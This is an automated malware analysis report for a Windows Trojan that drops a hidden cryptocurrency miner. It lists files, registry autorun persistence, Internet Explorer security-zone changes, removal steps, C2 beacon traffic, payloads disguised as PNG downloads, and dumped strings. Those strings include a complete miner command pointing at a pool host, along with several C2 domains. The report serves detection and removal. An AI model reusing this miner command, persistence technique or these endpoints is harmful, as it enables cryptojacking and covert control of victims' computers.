Trojan.Win32.Chebri.jm (Kaspersky), Gen:Variant.Symmi.42922 (AdAware), Trojan.Win32.Swrort.3.FD, Trojan.Win32.Swrort.5.FD, GenericInjector.YR (Lavasoft MAS)Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 204939cf633f794950a64b42ef0088de
SHA1: c2ad31eb6e50f0eac6c6df2aa8334da720683eee
SHA256: 359fc8444f51630ffe613c5a1683e79126d4cf4de3312cf5840e3811ffbdd879
SSDeep: 1536:ug2DwhXt6GdnssmBhWGKdEfnReWUkANjq3PTepCv9czvIKsF5iDZkEdvisaE0g:/2M1p94TWGKdEEWcdkbepACzIKK5iDZB
Size: 95744 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2014-06-07 07:24:11
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
0003F.tmp.exe:1500
%original file name%.exe:1836
The Trojan injects its code into the following process(es):
%original file name%.exe:640
minerd.exe:364
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process %original file name%.exe:640 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Cookies\Current_User@google[2].txt (647 bytes)
%Documents and Settings%\%current user%\Application Data\675F5D2DB02D8342A557D0A4ECB70B5C (1713 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0003F.tmp.exe (696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\A901719BDB96997A6903E6D034944796\pthreadGC2.dll (695 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\google[1].htm (22921 bytes)
%Documents and Settings%\%current user%\Application Data\31t1R8LPnv1UOeL1ygYGsn0w0VCT02Y (604 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\888256212[1].png (139281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\00040.tmp.exe (45505 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\846767599[1].png (337 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\A901719BDB96997A6903E6D034944796\libcurl.dll (1744 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\A901719BDB96997A6903E6D034944796\minerd.exe (696 bytes)
%Documents and Settings%\%current user%\Application Data\7425110477C00FBB20E6CF9BB432D760 (1713 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\562309044[1].png (139281 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@google[1].txt (262 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\index[1].htm (896 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (1928 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Startup\xncqnyyorsxlq.exe (696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\wbohuxzhxt.exe (696 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\00040.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0003F.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@google[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\00040.tmp.exe (0 bytes)
Registry activity
The process 0003F.tmp.exe:1500 makes changes in the system registry.
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad]
"WINSXS32"
The Trojan disables automatic startup of the application by deleting the following autorun value:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"WINSXS32"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"WINSXS32"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"WINSXS32"
The process %original file name%.exe:640 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 17 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CF B2 08 ED 19 F4 D8 3A 08 CE A1 F7 59 C7 2F 06"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"toexrjunjmxmfsfluiznsagzgviplr" = "%Documents and Settings%\%current user%\Application Data\wbohuxzhxt.exe"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:1836 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4F 9C 07 5D EF F6 B5 55 E4 20 15 4E E3 EE 30 84"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1402115051"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "%original file name%.exe"
The process minerd.exe:364 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "51 0E 2B E0 B3 5E 71 F6 03 B0 96 15 E8 8A 93 8A"
Dropped PE files
MD5 | File path |
---|---|
b3b52fec86b2f0602e4ee6726cedb475 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\A901719BDB96997A6903E6D034944796\libcurl.dll |
ac05fbba61f939cd90133032f2595c69 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\A901719BDB96997A6903E6D034944796\pthreadGC2.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
0003F.tmp.exe:1500
%original file name%.exe:1836 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Cookies\Current_User@google[2].txt (647 bytes)
%Documents and Settings%\%current user%\Application Data\675F5D2DB02D8342A557D0A4ECB70B5C (1713 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0003F.tmp.exe (696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\A901719BDB96997A6903E6D034944796\pthreadGC2.dll (695 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\google[1].htm (22921 bytes)
%Documents and Settings%\%current user%\Application Data\31t1R8LPnv1UOeL1ygYGsn0w0VCT02Y (604 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\888256212[1].png (139281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\00040.tmp.exe (45505 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\846767599[1].png (337 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\A901719BDB96997A6903E6D034944796\libcurl.dll (1744 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\A901719BDB96997A6903E6D034944796\minerd.exe (696 bytes)
%Documents and Settings%\%current user%\Application Data\7425110477C00FBB20E6CF9BB432D760 (1713 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\562309044[1].png (139281 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@google[1].txt (262 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\index[1].htm (896 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (1928 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Startup\xncqnyyorsxlq.exe (696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\wbohuxzhxt.exe (696 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"toexrjunjmxmfsfluiznsagzgviplr" = "%Documents and Settings%\%current user%\Application Data\wbohuxzhxt.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 39679 | 39936 | 4.49839 | 79a4a2e4dcaf9a3aeeee6e2782378240 |
.rdata | 45056 | 16206 | 16384 | 3.62658 | 70c87e14c493e857c346d7b32c1713c4 |
.data | 61440 | 19628 | 7680 | 4.01315 | bfdf697f4ba0816dbcf9330733889a0a |
.855645 | 81920 | 36 | 512 | 0.49456 | 4305edff9a269f78669d34a099c4bf1f |
.41d3359 | 86016 | 36 | 512 | 0.495582 | 0d37efda672e26ceb5f6ff7e7ae2a1af |
.c3a6f7 | 90112 | 4 | 512 | 0.056519 | d46190223de12e4e4a1db0b9c8d15584 |
.rsrc | 94208 | 28792 | 29184 | 4.76706 | 7282b099135755d52d4a881e04ea2936 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://carpetbrownsurface.com/index.php | |
hxxp://www5.0zz0.com/2014/05/28/22/846767599.png | |
hxxp://google.com/ | |
hxxp://www.google.ca/?gfe_rd=cr&ei=soy1U7_BCq7b8gf51oCQAw | |
hxxp://www6.0zz0.com/2014/05/29/00/888256212.png | |
hxxp://www13.0zz0.com/2014/05/29/00/562309044.png |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /2014/05/29/00/888256212.png HTTP/1.1
Host: www6.0zz0.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 03 Jul 2014 17:02:38 GMT
Server: Apache
Last-Modified: Thu, 29 May 2014 00:16:18 GMT
ETag: "d71032a-468a9-d67a3880"
Accept-Ranges: bytes
Content-Length: 288937
Connection: close
Content-Type: image/png
ZS...vH......Q6..HciO..z9..F.......7..6E.~jx)Wn...._. .quA.]9..S.$RS...H^N...`n.~..z8..z...vHuX\.....~QpPU...L@l..g...r'w...b.......^W.'......3..!.-....]qb...y|...f.....6.s.2......<.t...S>..H.D.N..@f.bu3z...^N.X.[S. Ds....0d=....!.{..(?Pz.V.}....73.....d...F........[.d?.|J.b....chE.n1..[.o*tvb.\s..8.....b.O..'`v...7..tq.........6XS......@....Q6..H.X.&...n...................-..........s..$$......H....d...f...<x.c..iA.p=..J(Ic.T[<.JE{._.R...............B/......O5..y...,J.|[..pWT...c.`..........!.ix..b@.sn....H.X.i.......rVh.2z.h....]....i.....m..r.T-0..........I...`.H.......^Qr.A...]hQq.r.h.nD..e.)B.y$.`.R38.AM):......'...(}...*....b.I.f|.....8..,.......`8.\z.....h....\..r...`.mh..8,.D...."...@.O9..*$N.%.1....d'-.....qg.`y...w6f..j..2&......w ...|...}..J.u.......}...cxFL09X...............,...-[aT./N..H..U..6..V..F.Z...U.(.j..C.....(.-..W..M...#VYGRl.?..7&..a......h\.. .....z._SO..04....*.U...}/.k<Y:.a..HH......h...B...e.6`.f.. ...........lh.".....]......`.Q.R........u../..=..a...2..........Cz.`...L..s.....HV*.b.[.)&......|^7c.......a.....v.#H..yC.l.^G.t.G...S.'...pF..G..:G...lG2a....9*... ..R..F....NrW.0.f#.....s0y...5.a..\1M....TP......Z..:..........t.,.]FA.....B-.c..s]/.I.....#N.YQ..U..18JA..>.`....?.;G.tz.G?.......NM.....C^3.........Z0....-3.J..7....B..xvp..V..]....T.K.......QeX...d.G..aB..1.L...2..q0.A.j(..U..O_..p..B...G....,J.q.k%.|..?8...D..X8.6.1L4..`W.uc.K...:.....S...;....c,&.aV.........M..~ ...p....Kz.t...l.....T.-h.M.......W....^>"...h.r.:L.!..(S.....].7...D.`.]~..~GC..@.n.....%..
<<
<<< skipped >>>
GET /2014/05/29/00/562309044.png HTTP/1.1
Host: www13.0zz0.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 03 Jul 2014 17:02:37 GMT
Server: Apache
Last-Modified: Thu, 29 May 2014 00:16:44 GMT
ETag: "71702c3-468a9-d806f300"
Accept-Ranges: bytes
Content-Length: 288937
Connection: close
Content-Type: image/png
ZS...vH......Q6..HciO..z9..F.......7..6E.~jx)Wn...._. .quA.]9..S.$RS...H^N...`n.~..z8..z...vHuX\.....~QpPU...L@l..g...r'w...b.......^W.'......3..!.-....]qb...y|...f.....6.s.2......<.t...S>..H.D.N..@f.bu3z...^N.X.[S. Ds....0d=....!.{..(?Pz.V.}....73.....d...F........[.d?.|J.b....chE.n1..[.o*tvb.\s..8.....b.O..'`v...7..tq.........6XS......@....Q6..H.X.&...n...................-..........s..$$......H....d...f...<x.c..iA.p=..J(Ic.T[<.JE{._.R...............B/......O5..y...,J.|[..pWT...c.`..........!.ix..b@.sn....H.X.i.......rVh.2z.h....]....i.....m..r.T-0..........I...`.H.......^Qr.A...]hQq.r.h.nD..e.)B.y$.`.R38.AM):......'...(}...*....b.I.f|.....8..,.......`8.\z.....h....\..r...`.mh..8,.D...."...@.O9..*$N.%.1....d'-.....qg.`y...w6f..j..2&......w ...|...}..J.u.......}...cxFL09X...............,...-[aT./N..H..U..6..V..F.Z...U.(.j..C.....(.-..W..M...#VYGRl.?..7&..a......h\.. .....z._SO..04....*.U...}/.k<Y:.a..HH......h...B...e.6`.f.. ...........lh.".....]......`.Q.R........u../..=..a...2..........Cz.`...L..s.....HV*.b.[.)&......|^7c.......a.....v.#H..yC.l.^G.t.G...S.'...pF..G..:G...lG2a....9*... ..R..F....NrW.0.f#.....s0y...5.a..\1M....TP......Z..:..........t.,.]FA.....B-.c..s]/.I.....#N.YQ..U..18JA..>.`....?.;G.tz.G?.......NM.....C^3.........Z0....-3.J..7....B..xvp..V..]....T.K.......QeX...d.G..aB..1.L...2..q0.A.j(..U..O_..p..B...G....,J.q.k%.|..?8...D..X8.6.1L4..`W.uc.K...:.....S...;....c,&.aV.........M..~ ...p....Kz.t...l.....T.-h.M.......W....^>"...h.r.:L.!..(S.....].7...D.`.]~..~GC..@.n.....%..
<<
<<< skipped >>>
POST /index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: 4C9B53A8086004515190B6B74733CD51
Host: carpetbrownsurface.com
Content-Length: 175
Cache-Control: no-cache
0=D4DD6EBD91&1=0&2=A7BE76C69182033329D77E&3=B0BE2CF2D2B8134E4FBE0E8E3DAA&4=AF9D2FF6CCF5613439A12AC11ACB754E1F10368B349407C22F0E555EB6C25950F4E3DB52CCD4EF9C615AE3B0CEF613&5=&6=
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Thu, 03 Jul 2014 16:54:19 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.4-14 deb7u9
258....[...3...O.$s.4?S..|.S.5.Z...L;...R....|F....Y....H.R..V.[.....:....d)..o.W....r..9-\,e2e.).*. .)&8%...........%_^.G......hGn. ..u......$.h..3.H..E!..#.].I.e.p8...]_.H.T@.~..\'..x.{AX.M..".........5s.%..N:.....g.t{....U....>.i.qJRm...R.cl/!.v..(....Z.H.M|.D.PZ.......@.....^....Y.F.m....o>O.9........z.j.. b#../.N.2}_e..E9.a..hA=b........t.:.ZE.;.....j..q......{$R....8Z..M........a//..kC ....u.F.w..(.7.j......|..'..i..O....T.d]U..8^..U.\....N.K.H...u.<....Z ..$.....'a.Q`.QO...[.@ *)...D.....o...H.m.%.i..8.!..1....w..}.......X...nM.r......&..//..G.....3.D..M.....K..s.4....A.a....!,......lH...7 ...0..
GET / HTTP/1.1
Host: google.com
Cache-Control: no-cache
HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Location: hXXp://VVV.google.ca/?gfe_rd=cr&ei=soy1U7_BCq7b8gf51oCQAw
Content-Length: 258
Date: Thu, 03 Jul 2014 17:02:42 GMT
Server: GFE/2.0
Alternate-Protocol: 80:quic
<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">.<TITLE>302 Moved</TITLE></HEAD><BODY>.<H1>302 Moved</H1>.The document has moved.<A HREF="hXXp://VVV.google.ca/?gfe_rd=cr&ei=soy1U7_BCq7b8gf51oCQAw">here</A>...</BODY></HTML>....
GET /2014/05/28/22/846767599.png HTTP/1.1
Host: www5.0zz0.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 03 Jul 2014 17:02:35 GMT
Server: Apache
Last-Modified: Wed, 28 May 2014 22:59:13 GMT
Accept-Ranges: bytes
Content-Length: 4608
Connection: close
Content-Type: image/png
..#./.7..@.W..^.........M..K.W...m........R....@.--......Zy.......G.........Xm........(..]....-....'...j0.bs...w....d.......D9.u%......S!.}...:......o....I<Rc;....Mb..q...v}..R....Y......vl.b.H .#.O;.F....D.....X...z...c:n...&p.0....}O..Ox9G..:.I.mV.._B.&.5%..`.0LM.......C.2....U...7......LS[..@.f.n.... ...........Q......Oy.E..^.T...x.%.....g..58=....Q.%.....t..........$.{...*.~.nm.....$.E....n...88p.....9.o-.s.q.i...MP....S..R.4.oCz.*.....g.df...X'..;....?~..K.B.(....@.T. .........n.A@.....~.d...]8..R.f...0.T.....i..<.h....A..`............].o...!..Xqa8..5Wc@.L=.&.%.p.@..U'....<..3..4H7.u..V....j...\...v.Sv*s.j..V=.V...K.vUd....){.._Q....V26.=.].Y$*...M3j..Jw`...B..!1..)....JL...A......P........?@...d.$......ye..1.....r.e.e......a`...-U$.<..>...9.%<Z.8.}..g.=....^....p.K..%.....]....$)......G...o.\.~.<c.4?9a....P.@....N.)7..0%h...h..u.D..Q.0..G4.....}.....;8..UA.sAV.H...........<...?fs...N$...Br a.vx.....y.....(...........CRJgf......0...-......~.'......Vw...y.....&.!!...{A.G.[.d.....Xc.b4..:vw*.......i.......G...x.....U|.cd,.@..~e..IT~.g?.4.{.po.....!.[p....1.v.\......'.'. 3.>.9.........7O......d28....................*..*gH .8...O..!\.?D......=.Iyq..^...j...f..`.$F....(R.,..'...U.3..:Y...4..X....a...v..:.......8..j.^...;......Q..:b..... 5....m.KoA......>q....16.e#32.<Ty.......9..q..G..5....5......mu..3.y.....W.....K....*.gH...<%-...@.b...!.{^.....7.9..7.}y...`......?Ma.(...X .M.Z.C4J...|..5.:..do...N.IJ.F{....../..x7}BH."..Q....v.F...... .]..:-_b..&....!.-...d.....f\.....O...
<<
<<< skipped >>>
GET /?gfe_rd=cr&ei=soy1U7_BCq7b8gf51oCQAw HTTP/1.1
Host: VVV.google.ca
Cache-Control: no-cache
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 03 Jul 2014 17:02:42 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: PREF=ID=a925c378d21ce293:FF=0:TM=1404406962:LM=1404406962:S=KArret2NkGUXTIqS; expires=Sat, 02-Jul-2016 17:02:42 GMT; path=/; domain=.google.ca
Set-Cookie: NID=67=BoS7-YpbkZYYxrZzYwTQm7_Eq70VeqxwWULcrm4HbSYyV4u7QEL-lisxKUuFWiBmnSrvSwXutG5XPxcnG663bxQ6eFoPkEdaP9PFL7SOpMcZ5UeObC5efZKJkZtaXdfM; expires=Fri, 02-Jan-2015 17:02:42 GMT; path=/; domain=.google.ca; HttpOnly
P3P: CP="This is not a P3P policy! See hXXp://VVV.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."
Server: gws
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Alternate-Protocol: 80:quic
Transfer-Encoding: chunked
8000..<!doctype html><html itemscope="" itemtype="hXXp://schema.org/WebPage" lang="en-CA"><head><meta content="/images/google_favicon_128.png" itemprop="image"><title>Google</title><script>(function(){.window.google={kEI:"soy1U_T9DaPksASZnIGoAw",getEI:function(a){for(var c;a&&(!a.getAttribute||!(c=a.getAttribute("eid")));)a=a.parentNode;return c||google.kEI},https:function(){return"https:"==window.location.protocol},kEXPI:"4791,4896,17259,4000116,4007661,4007830,4008142,4009033,4009641,4010806,4010858,4010899,4011228,4011258,4011679,4012373,4012504,4013395,4013414,4013591,4013723,4013787,4013823,4013920,4013967,4013979,4014016,4014093,4014431,4014515,4014637,4014671,4014804,4014991,4015234,4015236,4015260,4015266,4015550,4015587,4015633,4015772,4015989,4016127,4016309,4016367,4016372,4016487,4016824,4016855,4016976,4017162,4017204,4017280,4017285,4017544,4017554,4017579,4017595,4017612,4017639,4017681,4017694,4017710,4017742,4017789,4017818,4017881,4017894,4017902,4017913,4017981,4017982,4018009,4018019,4018030,4018126,4018159,4018283,4018363,4018416,4018480,4018511,4018519,4018532,4018542,4018554,4018569,4018621,4018638,4018757,4018834,4018914,4018923,4018933,4018949,4019005,4019037,4019074,4019084,4019142,4019184,4019191,4019200,4019205,4019268,4019281,4019387,4019415,4019423,4019427,4019429,4019438,4019661,8300007,8300012,8300027,8300057,8500223,8500256,8500272,8500306,8500357,8500365,8500394,8500421,8500433,8500444,8500462,8500470,8500472,8500495,10200044,10200083,1
<<
<<< skipped >>>
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
%original file name%.exe_640:
.text
.text
`.rdata
`.rdata
@.data
@.data
user32.dll
user32.dll
kernel32.dll
kernel32.dll
ShellExecuteW
ShellExecuteW
shell32.dll
shell32.dll
ole32.dll
ole32.dll
RegCloseKey
RegCloseKey
RegOpenKeyExW
RegOpenKeyExW
advapi32.dll
advapi32.dll
HttpOpenRequestW
HttpOpenRequestW
HttpSendRequestW
HttpSendRequestW
InternetOpenUrlW
InternetOpenUrlW
wininet.dll
wininet.dll
|PAM-U1_0.0.1
|PAM-U1_0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
http://www5.0zz0.com/2014/05/28/22/846767599.png
http://www5.0zz0.com/2014/05/28/22/846767599.png
Shttp://google.com/
Shttp://google.com/
http://www6.0zz0.com/2014/05/29/00/888256212.png
http://www6.0zz0.com/2014/05/29/00/888256212.png
http://www13.0zz0.com/2014/05/29/00/562309044.png
http://www13.0zz0.com/2014/05/29/00/562309044.png
minerd.exe
minerd.exe
minerd.exe -a scrypt -o stratum tcp://cococairports.com:8081 -u flywifi101.1 -p x
minerd.exe -a scrypt -o stratum tcp://cococairports.com:8081 -u flywifi101.1 -p x
ntdll.dll
ntdll.dll
0=%s&1=%lu&2=%s&3=%s&4=%s&5=%s&6=%s
0=%s&1=%lu&2=%s&3=%s&4=%s&5=%s&6=%s
0=%s&1=%s
0=%s&1=%s
%s\%s
%s\%s
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
calc.exe
calc.exe
/index.php
/index.php
HTTP/1.1
HTTP/1.1
carpetbrownsurface.com
carpetbrownsurface.com
roofingropers.com
roofingropers.com
greenalgeaocean.com
greenalgeaocean.com
%Documents and Settings%\%current user%\Application Data\wbohuxzhxt.exe
%Documents and Settings%\%current user%\Application Data\wbohuxzhxt.exe
@c:\%original file name%.exe
@c:\%original file name%.exe
%Documents and Settings%\%current user%\Start Menu\Programs\Startup
